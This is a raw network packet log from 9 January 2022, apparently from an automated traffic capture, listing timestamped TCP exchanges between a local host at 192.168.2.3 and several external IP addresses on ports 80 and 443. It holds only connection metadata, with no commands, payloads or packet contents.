Jan 9, 2022 18:48:53.330914974 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.330935955 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.330974102 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.331021070 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.331048965 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.331125021 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.331885099 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.331923008 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.331959963 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.331999063 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.332015991 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.332047939 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.333165884 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.333203077 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.333240986 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.333265066 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.333280087 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.333318949 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.333333969 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.337766886 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.337807894 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.337846994 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.337867975 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.337883949 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.337889910 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.338778019 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.338819981 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.338831902 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.338857889 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.338896036 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.338933945 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.338944912 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.338972092 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.418863058 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.419862986 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.419933081 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.484930992 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.484982014 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.485022068 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.485248089 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.485804081 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.485843897 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.485881090 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.485918999 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.485958099 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.486031055 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.486078978 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.486818075 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.486859083 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.486897945 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.486934900 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.486999989 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.487051964 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.491833925 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.491872072 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.491909981 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.491947889 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.491993904 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.492055893 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.492775917 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.492816925 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.492959976 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.494807959 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.495812893 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.495865107 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.495919943 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.497617960 CET	80	49871	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:53.498871088 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.498989105 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.499025106 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.499995947 CET	80	49871	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:53.500673056 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.500782967 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.500813007 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.500822067 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.500880003 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.500916004 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.500925064 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.500956059 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.500993967 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501029015 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501030922 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.501066923 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501106024 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.501106977 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501147032 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501163960 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.501187086 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501219034 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.501224041 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501264095 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501292944 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.501302004 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501395941 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.501847029 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501885891 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501924992 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501960993 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.501975060 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.502000093 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.502032995 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.502800941 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.502840042 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.502876043 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.502969980 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.583070993 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.583138943 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.583178997 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.583282948 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.583753109 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.583817005 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.648900032 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.648943901 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.648982048 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.649023056 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.649023056 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.649061918 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.649106979 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.649827003 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.649867058 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.649907112 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.649943113 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.649945974 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.649962902 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.649982929 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.650865078 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.650902987 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.650940895 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.650942087 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.650964022 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.650980949 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.651017904 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.651068926 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.651808977 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.651850939 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.651890993 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.651912928 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.651926994 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.651973963 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.652786016 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.652826071 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.652865887 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.652882099 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.652923107 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.652961969 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.652975082 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.653012037 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.653795958 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.653832912 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.653872013 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.653889894 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.653912067 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.653970003 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.654804945 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.654848099 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.654884100 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.654922009 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.654938936 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.654962063 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.654962063 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.655785084 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.655826092 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.655858040 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.655863047 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.655999899 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.656809092 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.656864882 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.656908989 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.656945944 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.656974077 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.656991959 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.665905952 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.665947914 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.665985107 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.666022062 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.666032076 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.666062117 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.666121006 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.666785002 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.666826010 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.666866064 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.666886091 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.666903973 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.666943073 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.666950941 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.666989088 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.667783022 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.667825937 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.667854071 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.667893887 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.667911053 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.667933941 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.667989016 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.668797970 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.668839931 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.668896914 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.668895960 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.668936968 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.668951035 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.669847012 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.669887066 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.669924021 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.669925928 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.669962883 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.669970036 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.670000076 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.670027018 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.670047045 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.670073032 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.670845985 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.670883894 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.670922995 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.670953989 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.670962095 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.671000004 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.671046972 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.671812057 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.671850920 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.671889067 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.671925068 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.671948910 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.671962976 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.671983957 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.672040939 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.672815084 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.672877073 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.672916889 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.672954082 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.672979116 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.673028946 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.673767090 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.673808098 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.673846006 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.673882008 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.673901081 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.673921108 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.673985958 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.674789906 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.674823999 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.674943924 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.675095081 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.839247942 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.877209902 CET	80	49871	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:53.883296013 CET	49871	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:53.883414984 CET	49871	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:54.056101084 CET	80	49871	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:54.213790894 CET	49872	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:54.390583038 CET	80	49872	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:54.390734911 CET	49872	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:54.390929937 CET	49872	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:54.390953064 CET	49872	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:54.567758083 CET	80	49872	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:54.587882996 CET	49873	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:54.753201962 CET	80	49873	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:54.753305912 CET	49873	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:54.753401995 CET	49873	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:54.755208015 CET	49873	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:54.918180943 CET	80	49873	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:54.961082935 CET	80	49872	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:54.961122990 CET	80	49872	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:54.961186886 CET	49872	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:54.961396933 CET	49872	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:55.029463053 CET	49874	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:55.137923002 CET	80	49872	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:55.201986074 CET	80	49874	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:55.203299046 CET	49874	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:55.203411102 CET	49874	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:55.207246065 CET	49874	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:55.339545012 CET	80	49873	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:55.339665890 CET	49873	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:55.340492964 CET	80	49873	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:55.340631962 CET	49873	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:55.377619028 CET	80	49874	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:55.381469011 CET	80	49874	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:55.506685019 CET	80	49873	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:55.764686108 CET	80	49874	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:55.764728069 CET	80	49874	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:55.764874935 CET	49874	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:55.943967104 CET	49874	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:56.116338015 CET	80	49874	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:56.181031942 CET	49875	443	192.168.2.3	67.199.248.10
Jan 9, 2022 18:48:56.181096077 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.181184053 CET	49875	443	192.168.2.3	67.199.248.10
Jan 9, 2022 18:48:56.181607962 CET	49875	443	192.168.2.3	67.199.248.10
Jan 9, 2022 18:48:56.181634903 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.240567923 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.240674019 CET	49875	443	192.168.2.3	67.199.248.10
Jan 9, 2022 18:48:56.242505074 CET	49875	443	192.168.2.3	67.199.248.10
Jan 9, 2022 18:48:56.242521048 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.242917061 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.243889093 CET	49875	443	192.168.2.3	67.199.248.10
Jan 9, 2022 18:48:56.284949064 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.363312960 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.363419056 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.363585949 CET	49875	443	192.168.2.3	67.199.248.10
Jan 9, 2022 18:48:56.363647938 CET	49875	443	192.168.2.3	67.199.248.10
Jan 9, 2022 18:48:56.363684893 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.363706112 CET	49875	443	192.168.2.3	67.199.248.10
Jan 9, 2022 18:48:56.363718987 CET	443	49875	67.199.248.10	192.168.2.3
Jan 9, 2022 18:48:56.396738052 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.396785975 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.396872997 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.397109032 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.397130013 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.451926947 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.452032089 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.454055071 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.454070091 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.454417944 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.455174923 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.496947050 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.572124004 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.572212934 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.572273016 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.572294950 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.572318077 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.572370052 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.572405100 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.572511911 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.572582006 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.572596073 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.572654009 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.572716951 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.572900057 CET	49876	443	192.168.2.3	67.199.248.14
Jan 9, 2022 18:48:56.572920084 CET	443	49876	67.199.248.14	192.168.2.3
Jan 9, 2022 18:48:56.687381029 CET	49877	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:56.849922895 CET	49879	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:56.859184027 CET	80	49877	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:56.859266043 CET	49877	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:56.859390974 CET	49877	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:56.859412909 CET	49877	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:57.014473915 CET	80	49879	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:57.014622927 CET	49879	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:57.016102076 CET	49879	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:57.016125917 CET	49879	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:57.029253006 CET	80	49877	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:57.180380106 CET	80	49879	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:57.407304049 CET	80	49877	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:57.407350063 CET	80	49877	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:57.407404900 CET	49877	80	192.168.2.3	47.251.44.201
